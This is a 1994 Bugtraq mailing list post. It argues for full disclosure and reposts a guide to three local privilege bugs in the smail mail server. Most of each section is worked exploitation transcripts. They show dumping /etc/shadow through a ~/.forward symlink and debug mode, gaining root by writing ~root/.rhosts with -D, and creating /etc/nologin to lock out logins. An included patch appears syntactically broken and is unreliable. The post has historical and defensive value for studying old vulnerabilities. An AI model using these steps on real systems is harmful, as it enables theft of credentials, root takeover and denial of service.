Bugtraq mailing list archives
Re: 3 SMAIL BUGS
From: xcelsior () altair csustan edu (Excelsior)
Date: Sun, 9 Oct 94 00:09:02 PDT
aleph1 () dfw net (Aleph One) spewed....
Ok for all of you asking which are the 3
here is the count down:
Number 3 - The SMTP DEBUG problem. Anyone can
telnet to your SMTP port and read any
file on the system.
You are exaggerating the problem. To exploit this, you have to have an account on the local machine (in order to create the ~/.forward link). Not just "anyone" can exploit it.
Fixed by adding
-smtp_debug in your smail config file.
Wrong wrong wrong! All the -smtp_debug flag does is keep you from exploiting it by telnetting directly to the smtp port. There is an easier way to exploit it.
Number 2 - The .forward problem. Another
configuration problem. Smail does not
check file atributes when delivering mail
^^^^^^^^^^^^^^ Wrong again. It does checks the file attributes, but not the attributes of the DIRECTORY you are trying to create the file in - thus causing the problem.
to a file pointed to by a .forward. Fixed
by adding the check_path attribute to the
forward file director.
and
Number 1 - Debug file bug. Smail create or append to
anyfile using the debug options!
How about explaining those bugs in detail? If I wanted to hear "There is a bug" with no explaination, I'd read CERT. Maybe you don't know how the bugs work, but if you do, don't be a WUSS - post it!
There. What I said will fix #1 and #2.
Nope, what you said will definitely NOT fix #1 or #3. You can fix #2 as you described, but you weren't very specific about it, were you?
Several different patches have been posted for #3 on usenet. Check comp.mail.smail and the comp.is.linux.* newsgroups. Also the maintainers of smail will fixed RSN.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Isn't that a little harsh? How about just giving them a course in
writing secure Setuid programs. :)
Ok, now everyone repeat after me:
BUGTRAQ IS A FULL DISCLOSURE LIST
That's right. FULL disclosure. Since all the elite cracker pussies
are too scared to describe their bugs in detail, I will. I am
including a security doc on smail that I wrote a little while ago.
I'm sure most of the cracker dudes got it from my DocServer and FTP
site, so here it comes to the rest of you. I hope this encourages
more people to stop being childish and post your bugs. I'll be
posting more goodies from my archives soon as well.
Share and enjoy.... :)
-------------------------------------------------
EXCELSIOR'S GUIDE TO SMAIL BUGS - Sept 1994
***
Bug #1
***
SYNOPSIS
--------
Use of ~/.forward and debug lets a local user read any file on the system.
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> ln -s /etc/shadow .forward
loser@possesux ~> ls -la .forward
lrwxrwxrwx 1 loser users 11 Sep 5 12:08 .forward -> /etc/shadow
loser@possesux ~> telnet localhost smtp
Trying 127.0.0.1...
Connected to localhost-gw.
Escape character is '^]'.
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:10
PDT
debug 20
250 Debugging level: 20
expn loser
[lots of crap]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more crap]
read 890 bytes
director dotforward: matched loser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
Connection closed by foreign host.
---------------
Contrary to popular belief, adding -smtp_debup to your smail config file
will NOT prevent this bug from occuring. It will just prevent exploitation
via the smtp port.
We can just do this....
----------
loser@possesux ~> smail -bs -v20
expand_string($primary_name Smail$version ready for fakemail on $date,(null),
(null)) called
expand_string returns possesux.warez.mil Smail3.1.28.1 ready for fakemail on
Mon, 5 Sep 94 12:15 PDT
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:15
PDT
expn loser
[same crap as before]
expand_string(~/.forward, /home/loser, loser) called
expand_string returns /home/loser/.forward
dtd_forwardfile: opening forward file /home/loser/.forward
[more of same crap]
read 890 bytes
director dotforward: matched loser, forwarded to
root:h3ysk0tT.p0ss3/suxc0cKeH:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
loser:xX/j0in.DaP0sSe4aNal.s3x:8000:0:99999:7:::
[.....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 loser ... not matched
quit
221 possesux.warez.mil closing connection
----------
The easy way to fix this is to nuke the -d and -v options from smail.
***
Bug #2
***
SYNOPSIS
--------
Smail called with the -D flag will allow you to create and append to any
file on the system.
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> cat ~/.forward
localhost loser
^D
loser@possesux ~> smail -bs -D ~root/.rhosts -v20
220 possesux.warez.mil Smail3.1.28.1 ready for fakemail on Mon, 5 Sep 94 12:23
PDT
expn loser
250 loser
quit
221 possesux.warez.mil closing connection
loser@possesux ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)
--------------
Neat, huh? Patch by nuking the -D option from smail.
I received the following patch recently. I haven't tested it, so use
at your own risk.
*** Omain.c Wed Mar 11 12:33:18 1993
--- main.c Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
}
- /*
- * change error file to debugging file from -D option, if any
- */
-
- if (arg_debug_file) {
- new_errfile = fopen(arg_debug_file, "a");
- if (new_errfile == NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file = NULL;
- } else {
- errfile = new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
- program, (long)getpid());
- }
- }
-
- /*
* read in the transport, router and director files, if needed
*
* NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
***************
*** 525,530 ****
--- 508,537 ----
if (prog_euid != REQUIRED_EUID)
queue_only = TRUE;
#endif
+
+ /*
+ * change error file to debugging file from -D option, if any
+ *
+ * JMJ: Change location of this fragment to below the setuid/setgid
+ * calls to allow for use of fopen_as_user() instead of just
+ * fopen().
+ *
+ * Side effect: -D now requires full pathname to debug file
+ */
+
+ if (arg_debug_file) {
+ new_errfile = fopen_as_user(arg_debug_file, "a", 1, real_uid,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file = NULL;
+ } else {
+ errfile = new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=%ld\n\n",
+ program, (long)getpid());
+ }
+ }
/*
* error processing can be other than TERMINAL only for
--
***
Bug #3
***
SYNOPSIS
--------
Files specified in ~/.forward can be created in any directory, regardless
of it's permissions. (File is still owned by mailbox owner, however.)
EXAMPLE OF EXPLOITATION
-----------------------
loser@possesux ~> echo "/etc/nologin" > ~/.forward
loser@possesux ~> mail -r root loser < /dev/null
loser@possesux ~> echo "Site shutdown due to smail lameness" >! /etc/nologin
loser@possesux ~> rlogin localhost
Site shutdown due to smail lameness
rlogin: connection closed.
---------
Plug up this hole by adding 'check_path' to the following part of
your /usr/lib/smail/transports file:
---
[...]
# file - deliver mail to files
#
# This is used implicitly when smail encounters addresses which begin with
# a slash or squiggle character, such as "/usr/info/list_messages" or
# perhaps "~/Mail/inbox".
file: driver = appendfile,
return_path, local, from, unix_from_hack;
file = $user, # file is taken from address
append_as_user, # use user-id associated with address
expand_user, # expand ~ and $ within address
check_path, #<--add this line
suffix = "\n",
mode = 0644
[...]
---
That's it for now. If you appreciated reading this file, then consider
posting your explotation scripts too.
Share and enjoy!
- Excelsior
Current thread:
- Re: 3 SMAIL BUGS Excelsior (Oct 09)